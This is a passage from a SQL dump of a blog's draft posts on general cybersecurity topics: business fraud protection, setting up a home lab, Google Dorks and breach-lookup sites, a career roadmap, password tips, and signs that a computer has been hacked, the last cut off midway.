style=\"font-weight: 400\"><span style=\"font-weight: 400\">Attending cybersecurity conferences and workshops</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Engaging with cybersecurity professionals and consultants</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly reviewing guidance from government cybersecurity agencies</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Use this knowledge to continuously improve your security posture and adapt to new threats</span><a href=\"https://www.getcybersafe.gc.ca/en/resources/get-cyber-safe-guide-small-businesses\"><span style=\"font-weight: 400\">5</span></a><span style=\"font-weight: 400\">.</span>\r\n<h2><span style=\"font-weight: 400\">14. Implement Vendor Risk Management</span></h2>\r\n<span style=\"font-weight: 400\">Many cyber attacks occur through vulnerabilities in third-party systems. Implement a robust vendor risk management program:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Assess the security practices of all vendors before engagement</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Include security requirements in all vendor contracts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly audit vendor compliance with security standards</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Limit vendor access to only necessary systems and data</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement secure file sharing and collaboration tools for vendor interactions</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider using vendor risk management platforms to streamline the assessment and monitoring process</span><a href=\"https://www.mass.gov/info-details/protect-your-company-from-cyber-attacks\"><span style=\"font-weight: 400\">4</span></a><span style=\"font-weight: 400\">.</span>\r\n<h2><span style=\"font-weight: 400\">15. Conduct Regular Security Assessments</span></h2>\r\n<span style=\"font-weight: 400\">Regularly assess your organization\'s security posture to identify and address vulnerabilities:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Perform internal and external vulnerability scans</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Conduct penetration testing to simulate real-world attacks</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Engage in red team exercises to test your defenses</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Perform regular security audits of your systems and processes</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use security information and event management (SIEM) tools for continuous monitoring</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Use the results of these assessments to prioritize security improvements and allocate resources effectively.</span>\r\n\r\n<span style=\"font-weight: 400\">Protecting your business from cyber fraud requires a multi-layered approach that combines technology, processes, and people. By implementing the strategies outlined in this guide, you can significantly reduce your risk of falling victim to cyber attacks and ensure the long-term security and success of your business. Remember that cybersecurity is an ongoing process, and staying vigilant and adaptable is key to maintaining a strong security posture in the face of evolving threats.</span>', '', NULL, NULL, 1, 'draft', '2024-12-01 17:00:39', '2026-01-12 21:41:44', 'Information Security', 'How to Protect Your Business from Cyber Fraud', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(96, 'Create Your HomeLab for Cybersecurity', 'create-your-homelab-for-cybersecurity', '<div class=\"paragraph normal ng-star-inserted\" data-start-index=\"36\">\r\n\r\nA home lab is a valuable tool for anyone interested in cybersecurity. It allows you to experiment in a safe environment and learn about different aspects of cybersecurity without risking damage to your primary systems or data. The concept of a home lab is similar to the \"smart books\" used in the military, which contain crucial information, checklists, and procedures for specific missions.\r\n\r\n<strong>Here\'s a guide to help you create your own cybersecurity home lab:</strong>\r\n\r\n<strong>1. Virtualization:</strong>\r\n<ul>\r\n 	<li>Virtualization is the core of a home lab. It allows you to run multiple operating systems (like Windows, Linux) on a single physical machine.</li>\r\n 	<li>This technology has been around for a long time. In the 1960s, IBM\'s M44/44X Project used a mainframe to simulate multiple computers, leading to the term \"virtual machine.\"</li>\r\n 	<li>Popular virtualization software options include <strong>VMware Workstation Player (for Windows and Linux) and Oracle VirtualBox (for Windows, Linux, and macOS).</strong></li>\r\n</ul>\r\n<strong>2. Choose an Operating System:</strong>\r\n<ul>\r\n 	<li><strong>Kali Linux</strong> is a popular choice for a cybersecurity lab.\r\n<ul>\r\n 	<li>It\'s specifically designed for penetration testing and security auditing.</li>\r\n 	<li>It comes pre-loaded with hundreds of tools for tasks like vulnerability scanning, network analysis, and exploit development.</li>\r\n</ul>\r\n</li>\r\n 	<li><strong>Parrot OS</strong> is another Debian-based Linux distribution focused on security, privacy, and development.\r\n<ul>\r\n 	<li>Like Kali Linux, it offers a vast collection of security tools.</li>\r\n 	<li>It\'s known for its user-friendly interface and strong focus on anonymity and privacy.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>3. Setting Up Your Virtual Machine:</strong>\r\n<ul>\r\n 	<li>Once you have your virtualization software and chosen operating system (like Kali Linux), follow these steps:\r\n<ul>\r\n 	<li>Download the ISO image of the OS.</li>\r\n 	<li>Create a new virtual machine within your virtualization software.</li>\r\n 	<li>Allocate sufficient resources like RAM (2GB or more is recommended) and hard disk space (at least 20GB).</li>\r\n 	<li>Configure the network settings to use NAT (Network Address Translation). This allows the virtual machine to share your host machine\'s internet connection.</li>\r\n 	<li>Install the operating system on the virtual machine.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>4. Installing Essential Tools:</strong>\r\n<ul>\r\n 	<li><strong>Update your system:</strong> Before you start, ensure your Kali Linux installation is up-to-date.</li>\r\n 	<li><strong>Package Manager:</strong> Kali Linux uses the APT (Advanced Package Tool) for installing, updating, and removing software packages.</li>\r\n 	<li><strong>Pimp My Kali:</strong> Consider using the \"Pimp My Kali\" script to automate the installation and configuration of essential tools and fix common issues in Kali Linux.</li>\r\n 	<li><strong>Other Tools:</strong> Depending on your learning goals, you can install additional tools like:\r\n<ul>\r\n 	<li><strong>Nmap:</strong> For network scanning and host discovery.</li>\r\n 	<li><strong>Metasploit:</strong> A framework for developing and executing exploits.</li>\r\n 	<li><strong>Burp Suite:</strong> For web application security testing.</li>\r\n 	<li><strong>Wireshark:</strong> For network traffic analysis.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>5. Practice and Experiment:</strong>\r\n<ul>\r\n 	<li>A home lab is your playground. Practice using different tools and techniques, and explore various cybersecurity concepts.</li>\r\n 	<li><strong>Set Up Vulnerable Environments:</strong> You can find intentionally vulnerable virtual machines online (like OWASP Broken Web Applications) to practice your hacking skills in a safe setting.</li>\r\n 	<li><strong>Capture the Flag (CTF) Challenges:</strong> Participate in online CTF competitions to test your skills and learn from others.</li>\r\n</ul>\r\n<strong>Key Considerations:</strong>\r\n<ul>\r\n 	<li><strong>Legality:</strong> Ensure that all your activities within your home lab are legal and ethical. Practice only on systems you own or have explicit permission to test.</li>\r\n 	<li><strong>Security:</strong> Isolate your home lab from your primary network to prevent any accidental damage or security breaches. Consider using a dedicated network for your lab.</li>\r\n 	<li><strong>Note-Taking:</strong> Maintain detailed notes of your experiments, commands, and findings. Use note-taking apps like KeepNote, CherryTree, or Joplin, and a screenshot tool like Greenshot.</li>\r\n</ul>\r\nCreating a home lab is an investment in your cybersecurity journey. It provides a hands-on learning experience that goes beyond theory. By experimenting and practicing in your lab, you\'ll gain valuable skills and knowledge that can be applied to real-world scenarios.\r\n\r\n<strong>Disclaimer:</strong> Information provided in this response that is not directly cited is based on general knowledge about cybersecurity and home labs and may be subject to change. Verifying and staying updated on current best practices for setting up and using a home lab for cybersecurity purposes is recommended.\r\n\r\n</div>', '', NULL, NULL, 1, 'draft', '2024-11-26 23:10:12', '2026-01-12 21:41:44', 'Information Security', 'Create Your HomeLab for Cybersecurity', '', NULL),
(97, 'Advanced Search Techniques', 'advanced-search-techniques', '<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Google Dorks: The Power of Precision Searching</h3>\r\nGoogle Dorks, a technique that emerged around 2006-2007, is a powerful tool for advanced information gathering. This method allows you to perform highly specific searches within Google\'s vast index, often revealing information that should not be publicly accessible. Some key applications include:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Searching within specific websites</li>\r\n 	<li>Finding database outputs containing sensitive keywords (e.g., \"pw\", \"session key\", \"session id\")</li>\r\n 	<li>Locating potentially exposed admin panels</li>\r\n</ul>\r\nMastering Google Dorks can significantly enhance your ability to conduct thorough research and uncover hidden information.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Password Security Research</h3>\r\nIn an era of frequent data breaches, it\'s crucial to verify the security of your passwords. Here are some valuable resources:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li><strong>Have I Been Pwned</strong>: A website by Troy Hunt that allows you to check if your email or password has been compromised in known data breaches</li>\r\n 	<li><strong>Bridgedirectory.org</strong>: This site can reveal the first few characters of exposed passwords associated with an email address</li>\r\n</ul>\r\nThese tools are not just for personal use; they can be instrumental in raising awareness about password security among colleagues and friends.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Automation and Tool Utilization</h3>\r\nIn today\'s AI-driven world, automation skills are indispensable. Here\'s how you can stay ahead:\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Finding and Using Tools</h3>\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li><strong>GitHub Exploration</strong>: Utilize GitHub\'s search features to discover new security tools and libraries</li>\r\n 	<li><strong>Octotrends.com</strong>: This site lists trending GitHub repositories, helping you stay updated with the latest tools and projects</li>\r\n</ul>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Leveraging AI for Coding</h3>\r\nEven if you\'re not a full-time developer, basic coding skills can be incredibly useful in cybersecurity. Modern AI tools can significantly boost your coding efficiency:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li><strong>GPT models</strong>: These can help with writing and debugging code, often solving in hours what might take days manually</li>\r\n 	<li><strong>Copilots and Code Whisperers</strong>: These AI assistants can provide real-time coding suggestions and solutions</li>\r\n</ul>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Social Engineering Awareness</h3>\r\nUnderstanding social engineering is crucial in the IT sector. Developing \"soft skills\" or interpersonal skills is vital for recognizing and mitigating social engineering threats\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Continuous Learning and Adaptation</h3>\r\nThe field of cybersecurity is ever-evolving. Stay current by:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Regularly exploring new tools and techniques</li>\r\n 	<li>Engaging with online communities and forums</li>\r\n 	<li>Practicing ethical hacking on platforms like Try Hack Me or Hack the Box</li>\r\n</ul>\r\nRemember, the goal is not to become an expert in every area but to develop a well-rounded understanding that complements your primary role and enhances your digital security awareness.By incorporating these skills and mindsets into your professional toolkit, you\'ll not only boost your cybersecurity proficiency but also increase your value in any IT-related field. Stay curious, keep learning, and always prioritize the ethical use of these powerful tools and techniques.', '', NULL, NULL, 1, 'draft', '2024-11-25 22:54:51', '2026-01-12 21:41:44', 'Information Security', 'Advanced Search Techniques', '', NULL),
(98, 'Cybersecurity Roadmap for Beginners', 'cybersecurity-roadmap-for-beginners', 'Cybersecurity has become a cornerstone of digital safety, safeguarding individuals, organizations, and nations from ever-evolving threats. For aspiring professionals and seasoned experts alike, charting a clear path in this dynamic field is essential. A well-structured cybersecurity roadmap serves as a guide, breaking down complex topics into manageable steps and aligning them with industry requirements. Whether you\'re exploring foundational skills like networking and system security or advanced domains such as penetration testing and incident response, this roadmap is designed to help you build a resilient, future-proof cybersecurity career.\r\n\r\n<strong>1. Understanding Cybersecurity</strong>\r\n<ul>\r\n 	<li><strong>Definition:</strong> Cybersecurity is the practice of protecting computers, servers, mobile devices, electronic systems, networks, and data from malicious attacks.</li>\r\n 	<li><strong>Importance:</strong> Cybersecurity is crucial because a successful cyberattack can have severe consequences, including financial loss, data breaches, reputational damage, and legal/compliance issues.</li>\r\n</ul>\r\n<strong>2. Getting Started</strong>\r\n<ul>\r\n 	<li><strong>Formal Education:</strong> A bachelor\'s degree in cybersecurity, computer science, or information technology provides a solid foundation.</li>\r\n 	<li><strong>Certifications:</strong> Industry-recognized certifications, such as CompTIA Security+ and Network+, demonstrate competency and commitment to the field.</li>\r\n 	<li><strong>Essential Skills:</strong>\r\n<ul>\r\n 	<li><strong>Technical Skills:</strong> Networking concepts (TCP/IP, DNS, VPNs), security tools (firewalls, IDS/IPS, SIEM), operating systems (Windows, Linux), and programming languages (Python, Bash).</li>\r\n 	<li><strong>Soft Skills:</strong> Analytical thinking, problem-solving, communication, and teamwork.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>3. Developing Core Competencies</strong>\r\n<ul>\r\n 	<li><strong>Networking and Security Protocols:</strong> Master the TCP/IP model, firewalls, VPNs, and network segmentation.</li>\r\n 	<li><strong>Cybersecurity Frameworks and Standards:</strong> Understand NIST, CIS, and ISO 27001 frameworks.</li>\r\n 	<li><strong>Programming for Cybersecurity:</strong> Learn Python or Bash for automation and scripting.</li>\r\n</ul>\r\n<strong>4. Advancing Your Career</strong>\r\n<ul>\r\n 	<li><strong>Specialize in a Domain:</strong> Choose a specific area of interest, such as penetration testing, SOC analysis, threat intelligence, or incident response.</li>\r\n 	<li><strong>Networking and Mentorship:</strong> Connect with professionals in the field, attend conferences, and seek guidance from mentors.</li>\r\n 	<li><strong>Continuous Learning:</strong> Stay updated on the latest threats and technologies by pursuing advanced certifications, attending training, and reading industry publications.</li>\r\n</ul>\r\n<strong>5. Exploring Cybersecurity Roles</strong>\r\n<ul>\r\n 	<li><strong>Security Operations Center (SOC) Analyst:</strong> Monitors security systems, analyzes alerts, and responds to incidents.</li>\r\n 	<li><strong>Penetration Tester:</strong> Identifies and exploits vulnerabilities in systems and applications.</li>\r\n 	<li><strong>Threat Intelligence Analyst:</strong> Gathers and analyzes information about potential threats.</li>\r\n 	<li><strong>Incident Responder:</strong> Investigates and contains security breaches.</li>\r\n 	<li><strong>Security Engineer:</strong> Designs, implements, and manages security solutions.</li>\r\n 	<li><strong>Security Consultant:</strong> Advises organizations on security best practices.</li>\r\n</ul>\r\n<strong>6. Building a Personal Brand</strong>\r\n<ul>\r\n 	<li><strong>Creating a Cybersecurity Portfolio:</strong> Showcase your skills and experience through case studies, blog posts, presentations, and open-source contributions.</li>\r\n 	<li><strong>Blogging and Content Creation:</strong> Share your knowledge and insights through blogging and social media.</li>\r\n 	<li><strong>Networking:</strong> Use social media to connect with professionals and build relationships.</li>\r\n</ul>\r\n<strong>7. Landing Your First Job</strong>\r\n<ul>\r\n 	<li><strong>Building a Strong Resume and Portfolio:</strong> Highlight relevant skills, certifications, and practical experience.</li>\r\n 	<li><strong>Job Search Strategies:</strong> Utilize online job boards, networking events, and company websites.</li>\r\n</ul>\r\n<strong>8. Incident Response</strong>\r\n<ul>\r\n 	<li>Develop and test an incident response plan.</li>\r\n 	<li>Implement procedures for detecting and responding to various types of attacks.</li>\r\n 	<li>Train employees on cybersecurity awareness and best practices.</li>\r\n</ul>\r\n<strong>9. Advanced Skills for Cybersecurity Analyst L2</strong>\r\n<ul>\r\n 	<li><strong>Forensic Investigation:</strong> Memory analysis, disk imaging, and log analysis.</li>\r\n 	<li><strong>Vulnerability Management:</strong> Vulnerability scanning, risk assessment, and remediation.</li>\r\n 	<li><strong>Advanced Malware Analysis:</strong> Reverse engineering, sandboxing, and behavioral analysis.</li>\r\n 	<li><strong>Cloud Security:</strong> Securing cloud platforms (AWS, Azure, Google Cloud).</li>\r\n 	<li><strong>Compliance and Governance:</strong> Understanding cybersecurity frameworks, policies, and regulations.</li>\r\n</ul>\r\n<strong>10. The Cybersecurity Hero\'s Journey</strong>\r\n<ul>\r\n 	<li><strong>Dedication and Persistence:</strong> Cybersecurity requires ongoing effort and a commitment to learning.</li>\r\n 	<li><strong>Embrace Challenges:</strong> View challenges as opportunities for growth.</li>\r\n 	<li><strong>Adaptability:</strong> Stay flexible and embrace new technologies and approaches.</li>\r\n 	<li><strong>Collaboration:</strong> Work effectively with others to achieve common goals.</li>\r\n 	<li><strong>Passion for Protecting Digital Assets:</strong> A genuine desire to make a positive impact is essential.</li>\r\n 	<li><strong>Personalize Your Journey:</strong> Tailor your career path to align with your interests and goals.</li>\r\n 	<li><strong>Build a Support Network:</strong> Seek guidance from mentors, peers, and colleagues.</li>\r\n 	<li><strong>Celebrate Your Achievements:</strong> Acknowledge your progress and successes.</li>\r\n</ul>\r\nThis roadmap offers a comprehensive overview of the path to becoming a cybersecurity professional. Remember your journey may vary based on your specific interests, skills, and goals.\r\n\r\nSoon I will create a very detailed PDF for this journey. Good luck !', '', NULL, NULL, 1, 'draft', '2024-11-18 17:16:46', '2026-01-12 21:41:44', 'Information Security', 'Cybersecurity Roadmap for Beginners', '', NULL),
(99, 'The Importance of Using Strong, Unique Passwords', 'the-importance-of-using-strong-unique-passwords', '<p class=\"mb-2 last:mb-0\">We rely heavily on various online platforms for work, entertainment, and daily life. From emails to banking to social media, our lives are intertwined with these digital services. However, the convenience of these platforms also comes with risks, such as data breaches and cyberattacks. One of the most critical ways to protect your information is by using strong, unique passwords.</p>\r\n\r\n<h4><strong>Tips for Creating Strong, Unique Passwords</strong></h4>\r\n<p class=\"mb-2 last:mb-0\">Creating strong, unique passwords can be challenging, but there are several strategies you can use:</p>\r\n\r\n<ol>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Use a Password Manager:</strong> Tools like LastPass or 1Password help generate and store complex passwords for all your accounts. These managers not only ensure that your passwords are secure but also reduce the risk of forgetting them.</p>\r\n\r\n<ul>\r\n 	<li><a class=\"text-blue-500 text-sm hover:underline\" href=\"https://www.lastpass.com/\" target=\"_blank\" rel=\"noopener noreferrer\">LastPass</a></li>\r\n 	<li><a class=\"text-blue-500 text-sm hover:underline\" href=\"https://1password.com/\" target=\"_blank\" rel=\"noopener noreferrer\">1Password</a></li>\r\n</ul>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Implement the Password Formula:</strong> Create a base password using a combination of letters (both upper and lower case), numbers, and special characters. For example: <code class=\"undefined font-semibold\">G7#xY9@q</code>.</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Use Passphrases:</strong> Replace single words in your password with longer phrases or sentences. For example: “ILoveMyCat2023!”</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Avoid Common Words and Patterns:</strong> Do not use easily guessable words, common sequences like “123456” or “qwerty,” or personal information such as your name or birthday.</p>\r\n</li>\r\n</ol>\r\n<h4><strong>Best Practices for Password Management</strong></h4>\r\n<p class=\"mb-2 last:mb-0\">To maintain the security of your accounts, follow these best practices:</p>\r\n\r\n<ol>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Change Your Password Regularly:</strong> Update your passwords every few months to prevent unauthorized access. This regular change can help mitigate the risk if a password is compromised.</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Enable Two-Factor Authentication (2FA):</strong> Adding an extra layer of security makes it harder for hackers to gain access even if they manage to steal your password. Setting up 2FA is generally easy and enhances account security significantly.</p>\r\n\r\n<ul>\r\n 	<li><a class=\"text-blue-500 text-sm hover:underline\" href=\"https://www.kaspersky.com/resource-center/definitions/two-factor-authentication\" target=\"_blank\" rel=\"noopener noreferrer\">How to Set Up 2FA</a></li>\r\n</ul>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Be Wary of Phishing Attempts:</strong> Never share your passwords with anyone or click on suspicious links in emails. Always verify the source before entering your login information. Be cautious of unsolicited emails asking for personal information.</p>\r\n</li>\r\n</ol>\r\n<h4><strong>Real-World Examples of Strong Passwords</strong></h4>\r\n<p class=\"mb-2 last:mb-0\">Here are some examples of strong, unique passwords:</p>\r\n\r\n<ol>\r\n 	<li><code class=\"undefined font-semibold\">G7#xY9@q</code> – This password uses a mix of uppercase and lowercase letters, numbers, and special characters.</li>\r\n 	<li><code class=\"undefined font-semibold\">ILoveMyCat2023!</code> – A passphrase that combines words with a year and an exclamation mark.</li>\r\n 	<li><code class=\"undefined font-semibold\">Th3Bl@ckH0rse$</code> – Another passphrase using a creative phrase.</li>\r\n</ol>\r\n<p class=\"mb-2 last:mb-0\">Remember, the more complex and unique your passwords are, the better protected your accounts will be.</p>\r\n\r\n<h4><strong>Additional Tips for Enhanced Security</strong></h4>\r\n<ol>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Use Different Passwords for Each Account:</strong> Avoid reusing the same password across multiple platforms. If one account is compromised, attackers can gain access to all other accounts if they use the same password.</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Enable CAPTCHA:</strong> Many websites offer a CAPTCHA feature during login or registration. Enabling this feature adds an additional layer of security against automated attacks.</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Regularly Update Software and Systems:</strong> Keep your operating system, browsers, and applications up to date with the latest security patches. These updates often include fixes for known vulnerabilities that could be exploited by attackers.</p>\r\n</li>\r\n 	<li>\r\n<p class=\"mb-2 last:mb-0\"><strong>Use Secure Networks:</strong> Avoid using public Wi-Fi networks for sensitive transactions or logging into important accounts. If you must use a public network, consider using a Virtual Private Network (VPN) to encrypt your internet connection.</p>\r\n</li>\r\n</ol>', '', NULL, NULL, 1, 'draft', '2024-11-14 17:42:55', '2026-01-12 21:41:44', 'Information Security', 'The Importance of Using Strong, Unique Passwords', '', NULL),
(100, 'How to Tell if Your Computer Has Been Hacked: A Practical Guide with Tools', 'how-to-tell-if-your-computer-has-been-hacked-a-practical-guide-with-tools', 'With the rise in cyber threats, learning to recognize the signs of a hacked computer has become essential for everyone, from everyday users to IT professionals. Here’s an in-depth guide on spotting indicators of compromise (IOCs) and using effective tools to investigate. By following these steps, you can gain insight into whether your system has been compromised and what actions to take next.\r\n<h3>1. <strong>Identify Initial Signs of Compromise</strong></h3>\r\nSpotting suspicious behavior on your computer is the first step in detecting potential threats. Here are some key red flags to watch for:\r\n<ul>\r\n 	<li><strong>Unexpected pop-ups and ads</strong>: If your screen is flooded with intrusive ads, especially when you aren’t browsing the web, it’s a warning sign.</li>\r\n 	<li><strong>Slow system performance</strong>: A significant slowdown in your computer’s performance, including lagging or crashing applications, can indicate malicious processes.</li>\r\n 	<li><strong>Unauthorized changes</strong>: Look out for unrecognized software installations, modified browser settings, or new desktop icons.</li>\r\n 	<li><strong>Abnormal data usage</strong>: Unexplained data usage spikes or frequent data transfers may be a sign of unauthorized access.</li>\r\n 	<li><strong>Disabled antivirus software</strong>: Some malware types will disable your security software, leaving your system vulnerable.</li>\r\n</ul>\r\nIf you experience one or more of these symptoms, proceed with the investigative steps below to verify if your system has been compromised.\r\n<h3>2. <strong>Check Running Processes with Task Manager</strong></h3>\r\nThe <strong>Task Manager</strong> provides a snapshot of your system’s performance and active processes. Identifying unknown or suspicious processes can reveal malware.\r\n<ul>\r\n 	<li><strong>Steps</strong>:\r\n<ol>\r\n 	<li>Open <strong>Task Manager</strong> by pressing <code>Ctrl + Shift + Esc</code>.</li>\r\n 	<li>Navigate to the <strong>Processes</strong> tab.</li>\r\n 	<li>Check CPU, Memory, and Disk columns to spot processes using high resources.</li>\r\n</ol>\r\n</li>\r\n 	<li><strong>Analyzing Processes</strong>:\r\n<ul>\r\n 	<li><strong>Research unfamiliar processes</strong>: Right-click each process and select <strong>Properties</strong> to view the location and description.</li>\r\n 	<li><strong>Use VirusTotal</strong>: If you suspect a process, upload the file to <strong>VirusTotal</strong> to check if it’s recognized as malware.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>VirusTotal</strong>: <a href=\"https://www.virustotal.com\" target=\"_new\" rel=\"noopener\">VirusTotal Website</a>\r\nUpload suspicious files for a multi-engine scan and threat analysis.\r\n<h3>3. <strong>Examine Startup Programs with Task Manager and Autoruns</strong></h3>\r\nMalicious software often configures itself to launch at startup to ensure persistence. Identifying and disabling unrecognized startup entries can prevent malware from reinitializing.\r\n<ul>\r\n 	<li><strong>Using Task Manager</strong>:\r\n<ol>\r\n 	<li>Go to Task Manager’s <strong>Startup</strong> tab.</li>\r\n 	<li>Review each program and disable anything that looks suspicious or unneeded.</li>\r\n</ol>\r\n</li>\r\n 	<li><strong>Using Autoruns for Advanced Analysis</strong>:\r\n<ul>\r\n 	<li><strong>Autoruns</strong> by Sysinternals offers a comprehensive view of all startup entries.</li>\r\n 	<li>Download Autoruns here: <a href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\" target=\"_new\" rel=\"noopener\">Autoruns Download</a></li>\r\n 	<li><strong>How to Use</strong>:\r\n<ul>\r\n 	<li>Look through entries under <strong>Logon</strong>, <strong>Scheduled Tasks</strong>, and <strong>Services</strong>.</li>\r\n 	<li>Right-click entries to research them online or check on VirusTotal.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\nAutoruns provides a powerful way to dig into startup programs and detect hidden malware. Be cautious when disabling startup programs, as some may be essential to your system’s operation.\r\n<h3>4. <strong>Inspect Active Services Using Autoruns</strong></h3>\r\nServices running in the background can include unauthorized programs designed to go unnoticed. Using Autoruns, you can analyze these services more effectively than through Task Manager alone.\r\n<ul>\r\n 	<li><strong>Steps</strong>:\r\n<ul>\r\n 	<li>In Autoruns, go to the <strong>Services</strong> tab.</li>\r\n 	<li>Look for services with vague or unfamiliar names, right-click on them, and select <strong>Properties</strong> to investigate further.</li>\r\n 	<li>Submit suspicious files to VirusTotal for a second opinion.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<h3>5. <strong>Analyze Network Connections with Command Prompt and Wireshark</strong></h3>\r\nMalware often communicates with external servers, transferring stolen data or receiving commands from the attacker. Use <strong>netstat</strong> and <strong>Wireshark</strong> to monitor network activity.\r\n<ul>\r\n 	<li><strong>Using Command Prompt</strong>:\r\n<ol>\r\n 	<li>Open Command Prompt.</li>\r\n 	<li>Type <code>netstat -an</code> to list all active network connections.</li>\r\n 	<li>Look for unusual IP addresses or ports, particularly for connections you didn’t initiate.</li>\r\n</ol>\r\n</li>\r\n 	<li><strong>Using Wireshark for Advanced Network Analysis</strong>:\r\n<ul>\r\n 	<li>Download Wireshark here: <a target=\"_new\" rel=\"noopener\">Wireshark Download</a></li>\r\n 	<li><strong>How to Use</strong>: Start capturing network traffic and look for unusual data flows, unfamiliar IPs, or large transfers when your system should be idle.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\nWireshark is powerful but can be complex for beginners. It allows you to apply filters to narrow down traffic, making it easier to spot anomalies in your network connections.\r\n<h3>6. <strong>Review Scheduled Tasks for Malicious Activity</strong></h3>\r\nCybercriminals often set up scheduled tasks to run malicious scripts periodically, gaining access and collecting data over time. Checking these scheduled tasks can reveal ongoing threats.\r\n<ul>\r\n 	<li><strong>Steps</strong>:\r\n<ol>\r\n 	<li>Open <strong>Task Scheduler</strong>.</li>\r\n 	<li>Check for tasks with names you don’t recognize or didn’t create.</li>\r\n 	<li>Disable suspicious tasks and research their origins.</li>\r\n</ol>\r\n</li>\r\n</ul>\r\nRegularly reviewing scheduled tasks can prevent malware from repeatedly launching at specified intervals. For a more detailed overview, Autoruns can also list scheduled tasks.\r\n<h3>7. <strong>Advanced Tools for Comprehensive Analysis</strong></h3>\r\nSeveral tools provide in-depth inspection capabilities, including checking files, memory dumps, and sandboxing unknown software.\r\n<ul>\r\n 	<li><strong>VirusTotal</strong>: Submit files for a multi-engine antivirus scan. <a href=\"https://www.virustotal.com\" target=\"_new\" rel=\"noopener\">VirusTotal Website</a></li>\r\n 	<li><strong>Intezer Analyze</strong>: Uses genetic code analysis to detect malware by comparing your files against known threats.\r\n<ul>\r\n 	<li>Access Intezer here: <a target=\"_new\" rel=\"noopener\">Intezer Analyze</a></li>\r\n</ul>\r\n</li>\r\n 	<li><strong>Sandboxing with Any.Run</strong>: Sandboxing tools allow you to test files in isolated environments. Upload files to Any.Run to observe their behavior without risking your system.\r\n<ul>\r\n 	<li>Try Any.Run here: <a href=\"https://any.run\" target=\"_new\" rel=\"noopener\">Any.Run</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\nFor deeper analysis, consider <strong>Volatility</strong> for memory forensics, allowing you to capture a memory dump and look for anomalies. Volatility offers detailed analysis for advanced users with experience in digital forensics.\r\n<h3>8. <strong>Use System Monitors to Detect Unauthorized Activity</strong></h3>\r\nSystem monitoring tools like <strong>Process Hacker</strong> and <strong>GlassWire</strong> offer real-time insights into active processes, network connections, and resource usage.\r\n<ul>\r\n 	<li><strong>Process Hacker</strong>: Provides detailed control over system processes and services.\r\n<ul>\r\n 	<li>Download here: <a target=\"_new\" rel=\"noopener\">Process Hacker</a></li>\r\n</ul>\r\n</li>\r\n 	<li><strong>GlassWire</strong>: Monitors your network activity and alerts you to unusual activity.\r\n<ul>\r\n 	<li>Download here: <a href=\"https://www.glasswire.com/\" target=\"_new\" rel=\"noopener\">GlassWire</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\nThese tools are user-friendly and provide additional details beyond Task Manager, making it easier to spot suspicious activity.\r\n<h3>9. <strong>Check Your Security Software for Disablement or Compromise</strong></h3>\r\nSome malware disables or bypasses antivirus software to evade detection. Confirm that your security tools, including antivirus and firewalls, are enabled and functioning.\r\n<ul>\r\n 	<li><strong>Steps</strong>:\r\n<ol>\r\n 	<li>Check your antivirus software’s status and update it if necessary.</li>\r\n 	<li>Open <strong>Windows Security</strong> &gt; <strong>Virus &amp; Threat Protection</strong> to review 